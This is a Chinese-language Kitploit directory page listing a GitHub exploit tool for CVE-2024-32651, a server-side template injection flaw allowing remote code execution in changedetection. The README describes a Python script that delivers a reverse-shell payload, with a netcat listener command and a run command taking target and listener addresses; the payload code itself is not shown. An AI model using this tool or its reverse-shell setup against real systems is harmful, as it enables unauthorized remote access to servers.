Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-32651-changedetection-RCE — 服务端模板注入漏洞利用工具 | Kitploit
工具/GitHubGitHub/s0ck3t-s3c/cve-2024-32651-changedetection-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubs0ck3t-s3c/cve-2024-32651-changedetection-rce

CVE-2024-32651-changedetection-RCE

服务端模板注入漏洞利用工具

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
4331年前尚未审核
分享

CVE-2024-32651 changedetection < 0.45.20 - 远程代码执行 (RCE)

服务端模板注入漏洞利用!!

1. 标题

通过服务端模板注入(SSTI)在易受攻击的Web应用中实现远程代码执行

2. 描述

此利用脚本针对易受服务端模板注入(SSTI)攻击的Web应用。攻击者可通过利用该漏洞在服务器上执行任意命令。所提供的Python脚本通过提交触发反向Shell的有效载荷来自动化利用过程。

3. 漏洞信息

  1. CVE ID: CVE-2024-32651
  2. 受影响系统: 使用服务端模板注入(SSTI)且具有易受攻击配置的Web应用。

4. 概念验证

要复现该漏洞,请针对易受攻击的Web应用执行提供的Python脚本。确保运行监听器(例如 nc -lvp 9999),以捕获反向Shell连接。

5. 使用方法

  1. 将脚本保存为文件 CVE-2024-32651.py。

  2. 安装所需的Python库(如果尚未安装):

    root@kitploit:~
    pip install requests beautifulsoup4
    
    
  • 要使用该脚本,请提供以下命令行参数:

    • --url: 易受攻击Web应用的基本URL(例如 http://10.10.10.10:5000)。
    • --port: 监听器端口(例如 9999)。
    • --ip: 监听器IP地址(例如 10.10.50.22)。
    • --notification: (可选) 通知URL 如果你想使用特定的通知URL。
    1. 使用Python 3运行脚本,并带上所需参数。语法如下:
      root@kitploit:~
      python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
      

    6. 致谢

    此修复版本的利用脚本基于 Zach Crosman (zcrosman) 发布的原始利用脚本(EDB-ID: 52027)。 您可以在此处查看原始利用脚本。 我感谢 Zach Crosman 对安全社区的贡献。

    下载工具